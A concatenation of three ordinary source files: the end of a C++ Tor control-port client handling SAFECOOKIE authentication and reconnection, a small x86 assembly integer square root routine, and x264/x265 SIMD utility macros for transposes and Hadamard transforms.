* (with the HMAC key as its first argument)
*
* After a controller sends a successful AUTHCHALLENGE command, the
* next command sent on the connection must be an AUTHENTICATE command,
* and the only authentication string which that AUTHENTICATE command
* will accept is:
*
* HMAC-SHA256("Tor safe cookie authentication controller-to-server hash",
* CookieString | ClientNonce | ServerNonce)
*
*/
static std::vector<uint8_t> ComputeResponse(const std::string &key, const std::vector<uint8_t> &cookie, const std::vector<uint8_t> &clientNonce, const std::vector<uint8_t> &serverNonce)
{
CHMAC_SHA256 computeHash((const uint8_t*)key.data(), key.size());
std::vector<uint8_t> computedHash(CHMAC_SHA256::OUTPUT_SIZE, 0);
computeHash.Write(cookie.data(), cookie.size());
computeHash.Write(clientNonce.data(), clientNonce.size());
computeHash.Write(serverNonce.data(), serverNonce.size());
computeHash.Finalize(computedHash.data());
return computedHash;
}
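// e.g. authchallenge_cb below verifies ComputeResponse(TOR_SAFE_SERVERKEY, ...)
// against the ServerHash it received, then sends
// ComputeResponse(TOR_SAFE_CLIENTKEY, ...) as the hex-encoded AUTHENTICATE payload.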
void TorController::authchallenge_cb(TorControlConnection& _conn, const TorControlReply& reply)
{
if (reply.code == 250) {
LogPrint(BCLog::TOR, "tor: SAFECOOKIE authentication challenge successful\n");
std::pair<std::string,std::string> l = SplitTorReplyLine(reply.lines[0]);
if (l.first == "AUTHCHALLENGE") {
std::map<std::string,std::string> m = ParseTorReplyMapping(l.second);
if (m.empty()) {
LogPrintf("tor: Error parsing AUTHCHALLENGE parameters: %s\n", SanitizeString(l.second));
return;
}
std::vector<uint8_t> serverHash = ParseHex(m["SERVERHASH"]);
std::vector<uint8_t> serverNonce = ParseHex(m["SERVERNONCE"]);
LogPrint(BCLog::TOR, "tor: AUTHCHALLENGE ServerHash %s ServerNonce %s\n", HexStr(serverHash), HexStr(serverNonce));
if (serverNonce.size() != 32) {
LogPrintf("tor: ServerNonce is not 32 bytes, as required by spec\n");
return;
}
std::vector<uint8_t> computedServerHash = ComputeResponse(TOR_SAFE_SERVERKEY, cookie, clientNonce, serverNonce);
if (computedServerHash != serverHash) {
LogPrintf("tor: ServerHash %s does not match expected ServerHash %s\n", HexStr(serverHash), HexStr(computedServerHash));
return;
}
std::vector<uint8_t> computedClientHash = ComputeResponse(TOR_SAFE_CLIENTKEY, cookie, clientNonce, serverNonce);
_conn.Command("AUTHENTICATE " + HexStr(computedClientHash), boost::bind(&TorController::auth_cb, this, _1, _2));
} else {
LogPrintf("tor: Invalid reply to AUTHCHALLENGE\n");
}
} else {
LogPrintf("tor: SAFECOOKIE authentication challenge failed\n");
}
}
void TorController::protocolinfo_cb(TorControlConnection& _conn, const TorControlReply& reply)
{
if (reply.code == 250) {
std::set<std::string> methods;
std::string cookiefile;
/*
* 250-AUTH METHODS=COOKIE,SAFECOOKIE COOKIEFILE="/home/x/.tor/control_auth_cookie"
* 250-AUTH METHODS=NULL
* 250-AUTH METHODS=HASHEDPASSWORD
*/
for (const std::string &s : reply.lines) {
std::pair<std::string,std::string> l = SplitTorReplyLine(s);
if (l.first == "AUTH") {
std::map<std::string,std::string> m = ParseTorReplyMapping(l.second);
std::map<std::string,std::string>::iterator i;
if ((i = m.find("METHODS")) != m.end())
boost::split(methods, i->second, boost::is_any_of(","));
if ((i = m.find("COOKIEFILE")) != m.end())
cookiefile = i->second;
} else if (l.first == "VERSION") {
std::map<std::string,std::string> m = ParseTorReplyMapping(l.second);
std::map<std::string,std::string>::iterator i;
if ((i = m.find("Tor")) != m.end()) {
LogPrint(BCLog::TOR, "tor: Connected to Tor version %s\n", i->second);
}
}
}
for (const std::string &s : methods) {
LogPrint(BCLog::TOR, "tor: Supported authentication method: %s\n", s);
}
// Prefer NULL, otherwise SAFECOOKIE. If a password is provided, use HASHEDPASSWORD
/* Authentication:
* cookie: hex-encoded ~/.tor/control_auth_cookie
* password: "password"
*/
std::string torpassword = gArgs.GetArg("-torpassword", "");
if (!torpassword.empty()) {
if (methods.count("HASHEDPASSWORD")) {
LogPrint(BCLog::TOR, "tor: Using HASHEDPASSWORD authentication\n");
boost::replace_all(torpassword, "\"", "\\\"");
_conn.Command("AUTHENTICATE \"" + torpassword + "\"", boost::bind(&TorController::auth_cb, this, _1, _2));
} else {
LogPrintf("tor: Password provided with -torpassword, but HASHEDPASSWORD authentication is not available\n");
}
} else if (methods.count("NULL")) {
LogPrint(BCLog::TOR, "tor: Using NULL authentication\n");
_conn.Command("AUTHENTICATE", boost::bind(&TorController::auth_cb, this, _1, _2));
} else if (methods.count("SAFECOOKIE")) {
// Cookie: hexdump -e '32/1 "%02x""\n"' ~/.tor/control_auth_cookie
LogPrint(BCLog::TOR, "tor: Using SAFECOOKIE authentication, reading cookie authentication from %s\n", cookiefile);
std::pair<bool,std::string> status_cookie = ReadBinaryFile(cookiefile, TOR_COOKIE_SIZE);
if (status_cookie.first && status_cookie.second.size() == TOR_COOKIE_SIZE) {
// _conn.Command("AUTHENTICATE " + HexStr(status_cookie.second), boost::bind(&TorController::auth_cb, this, _1, _2));
cookie = std::vector<uint8_t>(status_cookie.second.begin(), status_cookie.second.end());
clientNonce = std::vector<uint8_t>(TOR_NONCE_SIZE, 0);
GetRandBytes(clientNonce.data(), TOR_NONCE_SIZE);
_conn.Command("AUTHCHALLENGE SAFECOOKIE " + HexStr(clientNonce), boost::bind(&TorController::authchallenge_cb, this, _1, _2));
} else {
if (status_cookie.first) {
LogPrintf("tor: Authentication cookie %s is not exactly %i bytes, as is required by the spec\n", cookiefile, TOR_COOKIE_SIZE);
} else {
LogPrintf("tor: Authentication cookie %s could not be opened (check permissions)\n", cookiefile);
}
}
} else if (methods.count("HASHEDPASSWORD")) {
LogPrintf("tor: The only supported authentication mechanism left is password, but no password provided with -torpassword\n");
} else {
LogPrintf("tor: No supported authentication method\n");
}
} else {
LogPrintf("tor: Requesting protocol info failed\n");
}
}
void TorController::connected_cb(TorControlConnection& _conn)
{
reconnect_timeout = RECONNECT_TIMEOUT_START;
// First send a PROTOCOLINFO command to figure out what authentication is expected
if (!_conn.Command("PROTOCOLINFO 1", boost::bind(&TorController::protocolinfo_cb, this, _1, _2)))
LogPrintf("tor: Error sending initial protocolinfo command\n");
}
void TorController::disconnected_cb(TorControlConnection& _conn)
{
// Stop advertising service when disconnected
if (service.IsValid())
RemoveLocal(service);
service = CService();
if (!reconnect)
return;
LogPrint(BCLog::TOR, "tor: Not connected to Tor control port %s, trying to reconnect\n", target);
// Single-shot timer for reconnect. Use exponential backoff.
struct timeval time = MillisToTimeval(int64_t(reconnect_timeout * 1000.0));
if (reconnect_ev)
event_add(reconnect_ev, &time);
reconnect_timeout *= RECONNECT_TIMEOUT_EXP;
}
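// e.g. with the RECONNECT_TIMEOUT_* constants defined earlier, retry delays grow
// geometrically (start, start*exp, start*exp^2, ...) until connected_cb resets
// the timeout on a successful connection.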
void TorController::Reconnect()
{
/* Try to reconnect and reestablish if we get booted - for example, Tor
* may be restarting.
*/
if (!conn.Connect(target, boost::bind(&TorController::connected_cb, this, _1),
boost::bind(&TorController::disconnected_cb, this, _1) )) {
LogPrintf("tor: Re-initiating connection to Tor control port %s failed\n", target);
}
}
fs::path TorController::GetPrivateKeyFile()
{
return GetDataDir() / "onion_private_key";
}
void TorController::reconnect_cb(evutil_socket_t fd, short what, void *arg)
{
TorController *self = static_cast<TorController*>(arg);
self->Reconnect();
}
/****** Thread ********/
static struct event_base *gBase;
static std::thread torControlThread;
static void TorControlThread()
{
TorController ctrl(gBase, gArgs.GetArg("-torcontrol", DEFAULT_TOR_CONTROL));
event_base_dispatch(gBase);
}
void StartTorControl()
{
assert(!gBase);
#ifdef WIN32
evthread_use_windows_threads();
#else
evthread_use_pthreads();
#endif
gBase = event_base_new();
if (!gBase) {
LogPrintf("tor: Unable to create event_base\n");
return;
}
torControlThread = std::thread(std::bind(&TraceThread<void (*)()>, "torcontrol", &TorControlThread));
}
void InterruptTorControl()
{
if (gBase) {
LogPrintf("tor: Thread interrupt\n");
event_base_loopbreak(gBase);
}
}
void StopTorControl()
{
if (gBase) {
torControlThread.join();
event_base_free(gBase);
gBase = nullptr;
}
}
|
; INTEGER SQUARE ROOT
;
; file: intsqrt.asm
;
; Author: Matthew Sprigg
;
; Description: Calculates the integer square root
; of a number, rounded down. This is useful for
; algorithms that only need to iterate up to the
; square root of a number, because it takes far
; fewer bytes than other square root algorithms
; such as the Babylonian method.
;
; Example: 16 - 1 - 3 - 5 - 7 = 0
;
; There are four odd subtractors, thus the root is four.
;
; Ex 2: 4 - 1 - 3 = 0
;
; Root = 2.
;
; Ex 3: 12 - 1 - 3 - 5 - 7 = -4
;
; Less than zero, therefore 12 is not a perfect square.
; The square root is between 3 and 4.
; The integer square root is 3.
%include "asm_io.inc"
;--------------------------------------------------------
; initialized data is put in the .data segment
;
segment .data
;--------------------------------------------------------
; uninitialized data is put in the .bss segment
;
segment .bss
;--------------------------------------------------------
; code is put in the .text segment
;
segment .text
global intsqrt ; make accessible to other modules.
;--------------------------------------------------------
; FUNCTIONS / SUBPROGRAMS ;
;--------------------------------------------------------
intsqrt:
;
; int intsqrt(int n) {
;
; int counter = 0;
; int subtractor = 1;
;
; while (n > 0) {
; n -= subtractor;
; subtractor += 2;
; counter++;
; }
;
; return (n == 0) ? counter : counter - 1;
;}
;--------------------------------------------------------
; PROLOGUE ;
;--------------------------------------------------------
; VAR TABLE
; ==============================
; Data | Pointer | Pseudocode
; ------------------------------
; local 1 @ [ebp-4] <-- counter
; local 2 @ ebx <-- subtractor (register, not memory)
; sav EBP @ [ebp]
; retaddr @ [ebp+4]
; param 1 @ [ebp+8] <-- n
push ebp ; save original ebp val on stack.
mov ebp, esp ; new EBP = ESP
sub esp, 4 ; Local var needs 1 dword (counter).
push ebx ; Preserve ebx.
mov dword [ebp-4], 0 ; counter = 0;
;mov dword [ebp-8], 1 ; subtractor = 1;
mov ebx, 1 ; subtractor = 1;
; arithmetic instructions such as sub cannot
; operate on two memory locations.
;--------------------------------------------------------
; CODE ;
;--------------------------------------------------------
do_while: ; (n > 0)
sub [ebp+8], ebx ; n -= subtractor;
add ebx, 2 ; subtractor += 2;
inc dword [ebp-4] ; counter++;
cmp dword [ebp+8], 0 ; if (n <= 0) break;
jg do_while
setne bl
movzx ebx, bl
mov eax, [ebp-4]
sub eax, ebx
; Because the integer square root is one less than the result
; in counter UNLESS n reached exactly zero (a perfect square),
; it is necessary to have two possible results from the single
; var counter. SETNE removes the need for branches and takes
; fewer bytes.
;--------------------------------------------------------
; EPILOGUE ;
;--------------------------------------------------------
pop ebx ; restore ebx
add esp, 4 ; clean up local vars.
pop ebp ; restore ebp.
ret ; return.
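;
; e.g. declared from C as "int intsqrt(int n);" (cdecl-style frame: argument
; at [ebp+8], result in EAX): intsqrt(12) returns 3, intsqrt(16) returns 4.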
|
;*****************************************************************************
;* x86util.asm: x86 utility macros
;*****************************************************************************
;* Copyright (C) 2003-2013 x264 project
;* Copyright (C) 2013-2017 MulticoreWare, Inc
;*
;* Authors: Holger Lubitz <holger@lubitz.org>
;* Loren Merritt <lorenm@u.washington.edu>
;* Min Chen <chenm003@163.com>
;*
;* This program is free software; you can redistribute it and/or modify
;* it under the terms of the GNU General Public License as published by
;* the Free Software Foundation; either version 2 of the License, or
;* (at your option) any later version.
;*
;* This program is distributed in the hope that it will be useful,
;* but WITHOUT ANY WARRANTY; without even the implied warranty of
;* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
;* GNU General Public License for more details.
;*
;* You should have received a copy of the GNU General Public License
;* along with this program; if not, write to the Free Software
;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02111, USA.
;*
;* This program is also available under a commercial proprietary license.
;* For more information, contact us at license @ x265.com.
;*****************************************************************************
%assign FENC_STRIDE 64
%assign FDEC_STRIDE 32
%assign SIZEOF_PIXEL 1
%assign SIZEOF_DCTCOEF 2
%define pixel byte
%define vpbroadcastdct vpbroadcastw
%define vpbroadcastpix vpbroadcastb
%if HIGH_BIT_DEPTH
%assign SIZEOF_PIXEL 2
%assign SIZEOF_DCTCOEF 4
%define pixel word
%define vpbroadcastdct vpbroadcastd
%define vpbroadcastpix vpbroadcastw
%endif
%assign FENC_STRIDEB SIZEOF_PIXEL*FENC_STRIDE
%assign FDEC_STRIDEB SIZEOF_PIXEL*FDEC_STRIDE
%assign PIXEL_MAX ((1 << BIT_DEPTH)-1)
%macro FIX_STRIDES 1-*
%if HIGH_BIT_DEPTH
%rep %0
add %1, %1
%rotate 1
%endrep
%endif
%endmacro
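; e.g. FIX_STRIDES r1, r3 doubles both stride registers when HIGH_BIT_DEPTH,
; converting pixel counts to byte offsets for 16-bit pixels.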
%macro SBUTTERFLY 4
%ifidn %1, dqqq
vperm2i128 m%4, m%2, m%3, q0301 ; punpckh
vinserti128 m%2, m%2, xm%3, 1 ; punpckl
%elif avx_enabled && mmsize >= 16
punpckh%1 m%4, m%2, m%3
punpckl%1 m%2, m%3
%else
mova m%4, m%2
punpckl%1 m%2, m%3
punpckh%1 m%4, m%3
%endif
SWAP %3, %4
%endmacro
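; e.g. SBUTTERFLY wd, 0, 1, 2 interleaves the words of m0 and m1:
; m0 gets the interleaved low halves, m1 (via the SWAP) the high halves.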
%macro SBUTTERFLY2 4
punpckl%1 m%4, m%2, m%3
punpckh%1 m%2, m%2, m%3
SWAP %2, %4, %3
%endmacro
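; TRANSPOSE4x4W: in: four registers holding rows of 4 words each, %5 = tmp;
; out: the same registers hold the transposed 4x4 block.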
%macro TRANSPOSE4x4W 5
SBUTTERFLY wd, %1, %2, %5
SBUTTERFLY wd, %3, %4, %5
SBUTTERFLY dq, %1, %3, %5
SBUTTERFLY dq, %2, %4, %5
SWAP %2, %3
%endmacro
%macro TRANSPOSE2x4x4W 5
SBUTTERFLY wd, %1, %2, %5
SBUTTERFLY wd, %3, %4, %5
SBUTTERFLY dq, %1, %3, %5
SBUTTERFLY dq, %2, %4, %5
SBUTTERFLY qdq, %1, %2, %5
SBUTTERFLY qdq, %3, %4, %5
%endmacro
%macro TRANSPOSE4x4D 5
SBUTTERFLY dq, %1, %2, %5
SBUTTERFLY dq, %3, %4, %5
SBUTTERFLY qdq, %1, %3, %5
SBUTTERFLY qdq, %2, %4, %5
SWAP %2, %3
%endmacro
%macro TRANSPOSE8x8W 9-11
%if ARCH_X86_64
SBUTTERFLY wd, %1, %2, %9
SBUTTERFLY wd, %3, %4, %9
SBUTTERFLY wd, %5, %6, %9
SBUTTERFLY wd, %7, %8, %9
SBUTTERFLY dq, %1, %3, %9
SBUTTERFLY dq, %2, %4, %9
SBUTTERFLY dq, %5, %7, %9
SBUTTERFLY dq, %6, %8, %9
SBUTTERFLY qdq, %1, %5, %9
SBUTTERFLY qdq, %2, %6, %9
SBUTTERFLY qdq, %3, %7, %9
SBUTTERFLY qdq, %4, %8, %9
SWAP %2, %5
SWAP %4, %7
%else
; in: m0..m7, unless %11 in which case m6 is in %9
; out: m0..m7, unless %11 in which case m4 is in %10
; spills into %9 and %10
%if %0<11
movdqa %9, m%7
%endif
SBUTTERFLY wd, %1, %2, %7
movdqa %10, m%2
movdqa m%7, %9
SBUTTERFLY wd, %3, %4, %2
SBUTTERFLY wd, %5, %6, %2
SBUTTERFLY wd, %7, %8, %2
SBUTTERFLY dq, %1, %3, %2
movdqa %9, m%3
movdqa m%2, %10
SBUTTERFLY dq, %2, %4, %3
SBUTTERFLY dq, %5, %7, %3
SBUTTERFLY dq, %6, %8, %3
SBUTTERFLY qdq, %1, %5, %3
SBUTTERFLY qdq, %2, %6, %3
movdqa %10, m%2
movdqa m%3, %9
SBUTTERFLY qdq, %3, %7, %2
SBUTTERFLY qdq, %4, %8, %2
SWAP %2, %5
SWAP %4, %7
%if %0<11
movdqa m%5, %10
%endif
%endif
%endmacro
%macro WIDEN_SXWD 2
punpckhwd m%2, m%1
psrad m%2, 16
%if cpuflag(sse4)
pmovsxwd m%1, m%1
%else
punpcklwd m%1, m%1
psrad m%1, 16
%endif
%endmacro
%macro ABSW 2-3 ; dst, src, tmp (tmp used only if dst==src)
%if cpuflag(ssse3)
pabsw %1, %2
%elifidn %3, sign ; version for pairing with PSIGNW: modifies src
pxor %1, %1
pcmpgtw %1, %2
pxor %2, %1
psubw %2, %1
SWAP %1, %2
%elifidn %1, %2
pxor %3, %3
psubw %3, %1
pmaxsw %1, %3
%elifid %2
pxor %1, %1
psubw %1, %2
pmaxsw %1, %2
%elif %0 == 2
pxor %1, %1
psubw %1, %2
pmaxsw %1, %2
%else
mova %1, %2
pxor %3, %3
psubw %3, %1
pmaxsw %1, %3
%endif
%endmacro
%macro ABSW2 6 ; dst1, dst2, src1, src2, tmp, tmp
%if cpuflag(ssse3)
pabsw %1, %3
pabsw %2, %4
%elifidn %1, %3
pxor %5, %5
pxor %6, %6
psubw %5, %1
psubw %6, %2
pmaxsw %1, %5
pmaxsw %2, %6
%else
pxor %1, %1
pxor %2, %2
psubw %1, %3
psubw %2, %4
pmaxsw %1, %3
pmaxsw %2, %4
%endif
%endmacro
%macro ABSB 2
%if cpuflag(ssse3)
pabsb %1, %1
%else
pxor %2, %2
psubb %2, %1
pminub %1, %2
%endif
%endmacro
%macro ABSD 2-3
%if cpuflag(ssse3)
pabsd %1, %2
%else
%define %%s %2
%if %0 == 3
mova %3, %2
%define %%s %3
%endif
pxor %1, %1
pcmpgtd %1, %%s
pxor %%s, %1
psubd %%s, %1
SWAP %1, %%s
%endif
%endmacro
%macro PSIGN 3-4
%if cpuflag(ssse3) && %0 == 4
psign%1 %2, %3, %4
%elif cpuflag(ssse3)
psign%1 %2, %3
%elif %0 == 4
pxor %2, %3, %4
psub%1 %2, %4
%else
pxor %2, %3
psub%1 %2, %3
%endif
%endmacro
%define PSIGNW PSIGN w,
%define PSIGND PSIGN d,
%macro SPLATB_LOAD 3
%if cpuflag(ssse3)
movd %1, [%2-3]
pshufb %1, %3
%else
movd %1, [%2-3] ;to avoid crossing a cacheline
punpcklbw %1, %1
SPLATW %1, %1, 3
%endif
%endmacro
%imacro SPLATW 2-3 0
%if cpuflag(avx2) && %3 == 0
vpbroadcastw %1, %2
%else
PSHUFLW %1, %2, (%3)*q1111
%if mmsize == 16
punpcklqdq %1, %1
%endif
%endif
%endmacro
%imacro SPLATD 2-3 0
%if mmsize == 16
pshufd %1, %2, (%3)*q1111
%else
pshufw %1, %2, (%3)*q0101 + ((%3)+1)*q1010
%endif
%endmacro
%macro CLIPW 3 ;(dst, min, max)
pmaxsw %1, %2
pminsw %1, %3
%endmacro
%macro CLIPW2 4 ;(dst0, dst1, min, max)
pmaxsw %1, %3
pmaxsw %2, %3
pminsw %1, %4
pminsw %2, %4
%endmacro
%macro MOVHL 2 ; dst, src
%ifidn %1, %2
punpckhqdq %1, %2
%elif cpuflag(avx)
punpckhqdq %1, %2, %2
%elif cpuflag(sse4)
pshufd %1, %2, q3232 ; pshufd is slow on some older CPUs, so only use it on more modern ones
%else
movhlps %1, %2 ; may cause an int/float domain transition and has a dependency on dst
%endif
%endmacro
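; HADDD: horizontal add; reduce the dword lanes of %1 so the low dword holds
; their sum. %2 is a scratch register and is clobbered.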
%macro HADDD 2 ; sum junk
%if sizeof%1 >= 64
vextracti32x8 ymm%2, zmm%1, 1
paddd ymm%1, ymm%2
%endif
%if sizeof%1 >= 32
vextracti128 xmm%2, ymm%1, 1
paddd xmm%1, xmm%2
%endif
%if sizeof%1 >= 16
MOVHL xmm%2, xmm%1
paddd xmm%1, xmm%2
%endif
%if cpuflag(xop) && sizeof%1 == 16
vphadddq xmm%1, xmm%1
%endif
%if notcpuflag(xop)
PSHUFLW xmm%2, xmm%1, q1032
paddd xmm%1, xmm%2
%endif
%endmacro
%macro HADDW 2 ; reg, tmp
%if cpuflag(xop) && sizeof%1 == 16
vphaddwq %1, %1
MOVHL %2, %1
paddd %1, %2
%else
pmaddwd %1, [pw_1]
HADDD %1, %2
%endif
%endmacro
%macro HADDUWD 2
%if cpuflag(xop) && sizeof%1 == 16
vphadduwd %1, %1
%else
psrld %2, %1, 16
pslld %1, 16
psrld %1, 16
paddd %1, %2
%endif
%endmacro
%macro HADDUW 2
%if cpuflag(xop) && sizeof%1 == 16
vphadduwq %1, %1
MOVHL %2, %1
paddd %1, %2
%else
HADDUWD %1, %2
HADDD %1, %2
%endif
%endmacro
%macro PALIGNR 4-5 ; [dst,] src1, src2, imm, tmp
; AVX2 version uses a precalculated extra input that
; can be re-used across calls
%if sizeof%1==32
; %3 = abcdefgh ijklmnop (lower address)
; %2 = ABCDEFGH IJKLMNOP (higher address)
vperm2i128 %4, %1, %2, q0003 ; %4 = ijklmnop ABCDEFGH
%if %3 < 16
palignr %1, %4, %2, %3 ; %1 = bcdefghi jklmnopA
%else
palignr %1, %2, %4, %3-16 ; %1 = pABCDEFG HIJKLMNO
%endif
%elif cpuflag(ssse3)
%if %0==5
palignr %1, %2, %3, %4
%else
palignr %1, %2, %3
%endif
%else
%define %%dst %1
%if %0==5
%ifnidn %1, %2
mova %%dst, %2
%endif
%rotate 1
%endif
%ifnidn %4, %2
mova %4, %2
%endif
%if mmsize==8
psllq %%dst, (8-%3)*8
psrlq %4, %3*8
%else
pslldq %%dst, 16-%3
psrldq %4, %3
%endif
por %%dst, %4
%endif
%endmacro
%macro PSHUFLW 1+
%if mmsize == 8
pshufw %1
%else
pshuflw %1
%endif
%endmacro
; shift a mmxreg by n bytes, or a xmmreg by 2*n bytes
; values shifted in are undefined
; faster if dst==src
%define PSLLPIX PSXLPIX l, -1, ;dst, src, shift
%define PSRLPIX PSXLPIX r, 1, ;dst, src, shift
%macro PSXLPIX 5
%if mmsize == 8
%if %5&1
ps%1lq %3, %4, %5*8
%else
pshufw %3, %4, (q3210<<8>>(8+%2*%5))&0xff
%endif
%else
ps%1ldq %3, %4, %5*2
%endif
%endmacro
%macro DEINTB 5 ; mask, reg1, mask, reg2, optional src to fill masks from
%ifnum %5
pand m%3, m%5, m%4 ; src .. y6 .. y4
pand m%1, m%5, m%2 ; dst .. y6 .. y4
%else
mova m%1, %5
pand m%3, m%1, m%4 ; src .. y6 .. y4
pand m%1, m%1, m%2 ; dst .. y6 .. y4
%endif
psrlw m%2, 8 ; dst .. y7 .. y5
psrlw m%4, 8 ; src .. y7 .. y5
%endmacro
%macro SUMSUB_BA 3-4
%if %0==3
padd%1 m%2, m%3
padd%1 m%3, m%3
psub%1 m%3, m%2
%elif avx_enabled
padd%1 m%4, m%2, m%3
psub%1 m%3, m%2
SWAP %2, %4
%else
mova m%4, m%2
padd%1 m%2, m%3
psub%1 m%3, m%4
%endif
%endmacro
%macro SUMSUB_BADC 5-6
%if %0==6
SUMSUB_BA %1, %2, %3, %6
SUMSUB_BA %1, %4, %5, %6
%else
padd%1 m%2, m%3
padd%1 m%4, m%5
padd%1 m%3, m%3
padd%1 m%5, m%5
psub%1 m%3, m%2
psub%1 m%5, m%4
%endif
%endmacro
%macro HADAMARD4_V 4+
SUMSUB_BADC w, %1, %2, %3, %4
SUMSUB_BADC w, %1, %3, %2, %4
%endmacro
%macro HADAMARD8_V 8+
SUMSUB_BADC w, %1, %2, %3, %4
SUMSUB_BADC w, %5, %6, %7, %8
SUMSUB_BADC w, %1, %3, %2, %4
SUMSUB_BADC w, %5, %7, %6, %8
SUMSUB_BADC w, %1, %5, %2, %6
SUMSUB_BADC w, %3, %7, %4, %8
%endmacro
%macro TRANS_SSE2 5-6
; TRANSPOSE2x2
; %1: transpose width (d/q) - use SBUTTERFLY qdq for dq
; %2: ord/unord (for compat with sse4, unused)
; %3/%4: source regs
; %5/%6: tmp regs
%ifidn %1, d
%define mask [mask_10]
%define shift 16
%elifidn %1, q
%define mask [mask_1100]
%define shift 32
%endif
%if %0==6 ; less dependency if we have two tmp
mova m%5, mask ; ff00
mova m%6, m%4 ; x5x4
psll%1 m%4, shift ; x4..
pand m%6, m%5 ; x5..
pandn m%5, m%3 ; ..x0
psrl%1 m%3, shift ; ..x1
por m%4, m%5 ; x4x0
por m%3, m%6 ; x5x1
%else ; more dependency, one insn less. sometimes faster, sometimes not
mova m%5, m%4 ; x5x4
psll%1 m%4, shift ; x4..
pxor m%4, m%3 ; (x4^x1)x0
pand m%4, mask ; (x4^x1)..
pxor m%3, m%4 ; x4x0
psrl%1 m%4, shift ; ..(x1^x4)
pxor m%5, m%4 ; x5x1
SWAP %4, %3, %5
%endif
%endmacro
%macro TRANS_SSE4 5-6 ; see above
%ifidn %1, d
%ifidn %2, ord
psrl%1 m%5, m%3, 16
pblendw m%5, m%4, q2222
psll%1 m%4, 16
pblendw m%4, m%3, q1111
SWAP %3, %5
%else
%if avx_enabled
pblendw m%5, m%3, m%4, q2222
SWAP %3, %5
%else
mova m%5, m%3
pblendw m%3, m%4, q2222
%endif
psll%1 m%4, 16
psrl%1 m%5, 16
por m%4, m%5
%endif
%elifidn %1, q
shufps m%5, m%3, m%4, q3131
shufps m%3, m%3, m%4, q2020
SWAP %4, %5
%endif
%endmacro
%macro TRANS_XOP 5-6
%ifidn %1, d
vpperm m%5, m%3, m%4, [transd_shuf1]
vpperm m%3, m%3, m%4, [transd_shuf2]
%elifidn %1, q
shufps m%5, m%3, m%4, q3131
shufps m%3, m%4, q2020
%endif
SWAP %4, %5
%endmacro
%macro HADAMARD 5-6
; %1=distance in words (0 for vertical pass, 1/2/4 for horizontal passes)
; %2=sumsub/max/amax (sum and diff / maximum / maximum of absolutes)
; %3/%4: regs
; %5(%6): tmpregs
%if %1!=0 ; have to reorder stuff for horizontal op
%ifidn %2, sumsub
%define ORDER ord
; sumsub needs order because a-b != b-a unless a=b
%else
%define ORDER unord
; if we just max, order doesn't matter (allows pblendw+or in sse4)
%endif
%if %1==1
TRANS d, ORDER, %3, %4, %5, %6
%elif %1==2
%if mmsize==8
SBUTTERFLY dq, %3, %4, %5
%else
TRANS q, ORDER, %3, %4, %5, %6
%endif
%elif %1==4
SBUTTERFLY qdq, %3, %4, %5
%elif %1==8
SBUTTERFLY dqqq, %3, %4, %5
%endif
%endif
%ifidn %2, sumsub
SUMSUB_BA w, %3, %4, %5
%else
%ifidn %2, amax
%if %0==6
ABSW2 m%3, m%4, m%3, m%4, m%5, m%6
%else
ABSW m%3, m%3, m%5
ABSW m%4, m%4, m%5
%endif
%endif
pmaxsw m%3, m%4
%endif
%endmacro
%macro HADAMARD2_2D 6-7 sumsub
HADAMARD 0, sumsub, %1, %2, %5
HADAMARD 0, sumsub, %3, %4, %5
SBUTTERFLY %6, %1, %2, %5
%ifnum %7
HADAMARD 0, amax, %1, %2, %5, %7
%else
HADAMARD 0, %7, %1, %2, %5
%endif
SBUTTERFLY %6, %3, %4, %5
%ifnum %7
HADAMARD 0, amax, %3, %4, %5, %7
%else
HADAMARD 0, %7, %3, %4, %5
%endif
%endmacro
%macro HADAMARD4_2D 5-6 sumsub
HADAMARD2_2D %1, %2, %3, %4, %5, wd
HADAMARD2_2D %1, %3, %2, %4, %5, dq, %6
SWAP %2, %3
%endmacro
%macro HADAMARD4_2D_SSE 5-6 sumsub
HADAMARD 0, sumsub, %1, %2, %5 ; 1st V row 0 + 1
HADAMARD 0, sumsub, %3, %4, %5 ; 1st V row 2 + 3
SBUTTERFLY wd, %1, %2, %5 ; %1: m0 1+0 %2: m1 1+0
SBUTTERFLY wd, %3, %4, %5 ; %3: m0 3+2 %4: m1 3+2
HADAMARD2_2D %1, %3, %2, %4, %5, dq
SBUTTERFLY qdq, %1, %2, %5
HADAMARD 0, %6, %1, %2, %5 ; 2nd H m1/m0 row 0+1
SBUTTERFLY qdq, %3, %4, %5
HADAMARD 0, %6, %3, %4, %5 ; 2nd H m1/m0 row 2+3
%endmacro
%macro HADAMARD8_2D 9-10 sumsub
HADAMARD2_2D %1, %2, %3, %4, %9, wd
HADAMARD2_2D %5, %6, %7, %8, %9, wd
HADAMARD2_2D %1, %3, %2, %4, %9, dq
HADAMARD2_2D %5, %7, %6, %8, %9, dq
HADAMARD2_2D %1, %5, %3, %7, %9, qdq, %10
HADAMARD2_2D %2, %6, %4, %8, %9, qdq, %10
%ifnidn %10, amax
SWAP %2, %5
SWAP %4, %7
%endif
%endmacro
; doesn't include the "pmaddubsw hmul_8p" pass
%macro HADAMARD8_2D_HMUL 10
HADAMARD4_V %1, %2, %3, %4, %9
HADAMARD4_V %5, %6, %7, %8, %9
SUMSUB_BADC w, %1, %5, %2, %6, %9
HADAMARD 2, sumsub, %1, %5, %9, %10
HADAMARD 2, sumsub, %2, %6, %9, %10
SUMSUB_BADC w, %3, %7, %4, %8, %9
HADAMARD 2, sumsub, %3, %7, %9, %10
HADAMARD 2, sumsub, %4, %8, %9, %10
HADAMARD 1, amax, %1, %5, %9, %10
HADAMARD 1, amax, %2, %6, %9, %5
HADAMARD 1, amax, %3, %7, %9, %5
HADAMARD 1, amax, %4, %8, %9, %5
%endmacro
%macro SUMSUB2_AB 4
%if cpuflag(xop)
pmacs%1%1 m%4, m%3, [p%1_m2], m%2
pmacs%1%1 m%2, m%2, [p%1_2], m%3
%elifnum %3
psub%1 m%4, m%2, m%3
psub%1 m%4, m%3
padd%1 m%2, m%2
padd%1 m%2, m%3
%else
mova m%4, m%2
padd%1 m%2, m%2
padd%1 m%2, %3
psub%1 m%4, %3
psub%1 m%4, %3
%endif
%endmacro
%macro SUMSUBD2_AB 5
%ifnum %4
psra%1 m%5, m%2, 1 ; %3: %3>>1
psra%1 m%4, m%3, 1 ; %2: %2>>1
padd%1 m%4, m%2 ; %3: %3>>1+%2
psub%1 m%5, m%3 ; %2: %2>>1-%3
SWAP %2, %5
SWAP %3, %4
%else
mova %5, m%2
mova %4, m%3
psra%1 m%3, 1 ; %3: %3>>1
psra%1 m%2, 1 ; %2: %2>>1
padd%1 m%3, %5 ; %3: %3>>1+%2
